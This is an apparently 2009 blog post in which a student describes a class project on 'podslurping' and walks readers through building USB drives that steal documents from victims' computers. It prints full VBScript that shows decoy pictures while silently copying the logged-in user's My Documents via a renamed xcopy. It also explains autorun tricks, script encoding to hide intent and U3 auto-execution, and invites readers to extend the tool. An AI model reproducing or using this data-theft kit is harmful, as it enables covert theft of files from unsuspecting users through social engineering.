Linux
Apache
MySQL
PHP

CSS
XHTML1.1
XML/RSS

Creative Commons

2009-04-07 20:09:56

Podslurping

During the second half of the Spring 2009 semester, I am taking a class on Information Security Assurance and Auditing. We are required to complete a final project, given some pre-defined topics. The only topic that was REMOTELY appealing was "podslurping." At the first chance, Rhuel and I asked to do that for our project.
I recommend you download the archive (end of the article) and read through the presentation first. (The presentation is given in PPT and PDF form, since some systems may not have the specific font used in the PPT thus making it render incorrectly.) You may also listen to the MP3 of our presentation, found at the end of this article.
So what I'd like to do is go over the contents of the archive so you know what you have to do to make your own podslurping USB drives. First, you'll notice there are two folders: std and u3. Inside of those folders are the files that you'll need to place on a standard USB drive for the "social engineering" version and the U3 USB drive for the "fully automatic" version, respectively.

NOTE: The files in the u3 folder do NOT get placed directly on the USB drive like the std files do. Instead, you need to use the U3 Installer, which will make an ISO from the u3 directory and "burn" that ISO to the U3/ROM portion of the U3 drive.

In the std directory you will find a pictures directory, which contains some images to assist in your social engineering (keep the person's attention while their files are being stolen). The autorun.inf file executes our script when activated by Autoplay, and also if the user tries to be sneaky and right click the drive, selecting either Open or Explore. So we can even trick some savvy users... The icon file, image.ico, is used in the Autoplay dialog to make it really look like this drive was meant to display pictures. The script, written in VBScript since it is native to Windows, has been encoded to most people will not be able to discover what it does. You can read about script encoding in my previous article, Fooify your VBScript. The executable, defaults.exe, is actually xcopy.exe. We renamed it so it appears harmless and as if it's just a random file that was on the drive from the factory. The text file, exclude.txt, lists file extensions that we don't want to copy, such as multimedia files. We're only interested in business-related files.
Since the fully automatic, U3, version isn't meant to socially engineer anyone, the images are removed from that directory and are not opened by the script.
Since the U3 script is just a slimmed down version of the standard script, I will only display the standard script. Plus, you downloaded the archive, so you have everything already.
On Error Resume Next '''''''''''''''''''' ' Set some variables '''''''''''''''''''' ComputerName = "." Set oSHell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:\\" & ComputerName & "\root\CIMV2") Const wbemFlagReturnImmediately = &h10 Const wbemFlagForwardOnly = &h20 Const HKLM = &H80000002 sProfileRegBase = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" '''''''''''''''''''''''''' ' Get the system directory '''''''''''''''''''''''''' Set colItems = objWMIService.ExecQuery _ ("SELECT WindowsDirectory FROM Win32_OperatingSystem", "WQL", _ wbemFlagReturnImmediately + wbemFlagForwardOnly) For Each objItem In colItems windowsDir = objItem.WindowsDirectory Next '''''''''''''''''''''''''''' ' Pop a window with the pics '''''''''''''''''''''''''''' sCmd = windowsDir & "\explorer.exe /n,.\pictures" oShell.Run sCmd,1,False '''''''''''''''''''''''''''''''''''''''''''''''''' ' Get the user profile directory from the registry '''''''''''''''''''''''''''''''''''''''''''''''''' Set oReg = GetObject("WinMgmts:{impersonationLevel=impersonate}!//" & _ ComputerName & "/root/default:StdRegProv") oReg.GetExpandedStringValue HKLM, sProfileRegBase, "ProfilesDirectory", _ profilePath '''''''''''''''''''''''''''' ' Get the computer/user name '''''''''''''''''''''''''''' Set colItems = objWMIService.ExecQuery _ ("SELECT Name,UserName FROM Win32_ComputerSystem", "WQL", _ wbemFlagReturnImmediately + wbemFlagForwardOnly) For Each objItem In colItems systemName = objItem.Name fullUserName = objItem.UserName Next userNameArr = Split(fullUserName, "\") userName = userNameArr(1) ''''''' ' Slurp ''''''' sCmd = ".\defaults.exe """ & profilePath & "\" & userName & _ "\My Documents\*.*"" " & ".\" & systemName & _ " /s/c/q/r/h/i/y /EXCLUDE:exclude.txt" oShell.Run sCmd,0,True ''''''''' ' Cleanup ''''''''' Set oShell = Nothing Set objWMIService = Nothing Set oReg = Nothing
NOTE: Do NOT copy/paste the above script and expect it to work. I did some line breaking to make sure it fit in a browser window and am not 100% sure that it will still work.
So here's what's going on in a nutshell. We make use of two main parts of the Windows OS, WScript and the Windows Management Instrumentation (WMI). In our "variables" section we call upon WScript to make us a shell so that we can execute commands and we set up our connection to WMI so that we can query the system for information about itself. We also set some flags and some registry locations, since we'll be needing to read the registry later.
The first real section uses WMI to figure out where the host's system directory is. We cannot assume that Windows was installed in C:\Windows, so we ask the system where it's system directory is.
That is enough information to begin our social engineering. We now know where explorer.exe is located, so we can pop a window with our pictures, hoping to keep the person busy while the rest of the script executes. The critical part to this section is the last part of the run command. The last two arguments are 1 and False. The 1 says to run the command in the foreground (we want the explorer window to be seen) and the False says to continue executing the script instead of waiting for the explorer window to be closed first. This assures that the file stealing will start immediately.
What we ultimately want to do is copy the currently logged in user's My Documents directory to our USB drive. We need to know a few things first. Number one, where user profiles are stored. We cannot assume that they are in "Documents and Settings," because Vista stored them in "Users" and if roaming profiles are configured they are stored somewhere on the network. So we have to read the registry to find out where the profiles directory is.
The next piece of information we need is the username of the currently logged in user and the hostname of the victim's host (we name the directory on our USB drive after the victim's hostname). These two pieces of information can be retrieved via one query to WMI. As you can see, the username comes out as DOMAIN\USERNAME, so we have to do a little string manipulation to extract ONLY the username.
Now we have everything we need to steal some files. The next part of the script calls defaults.exe (XCopy) and copies the business-related files from the user's My Documents directory to our USB drive.
That's it. Pretty simple, right? Of course, we didn't account for everything. Feel free to take the script and extend it to look in multiple locations or copy files for multiple users (instead of only the currently logged in user). I have plans to port this script to *nix and OSX so that I can have a single USB drive that can slurp from any machine. We'll see if I ever get around to doing that ;)

Download slurp.tar.bz2


Download podslurping.mp3

Back

5 comments


2009-04-08 09:20:40


DeVito says...
I never heard of this...Very Good Presentation!!!

2009-04-08 09:43:29


slonkak says...
Thanks, man! I'm glad you found it interesting, however useful (useless) it may be for the non-criminal ;)

2009-11-22 07:37:13


KosK says...
Thanks mate! I have a the same project at my computer security class and your presentation proved a lot helpful! Very well done!!!

2010-12-14 11:13:11


Rhuel says...
How are the *nix and OSX versions coming along? ;-) I currently work with a guy that used to work with Abe Usher back at NGC. Small world.

2010-12-14 11:19:39


slonkak says...
I think the question is, have I even looked at this since we finished our presentation...?

Post a comment!

Name:
Comment: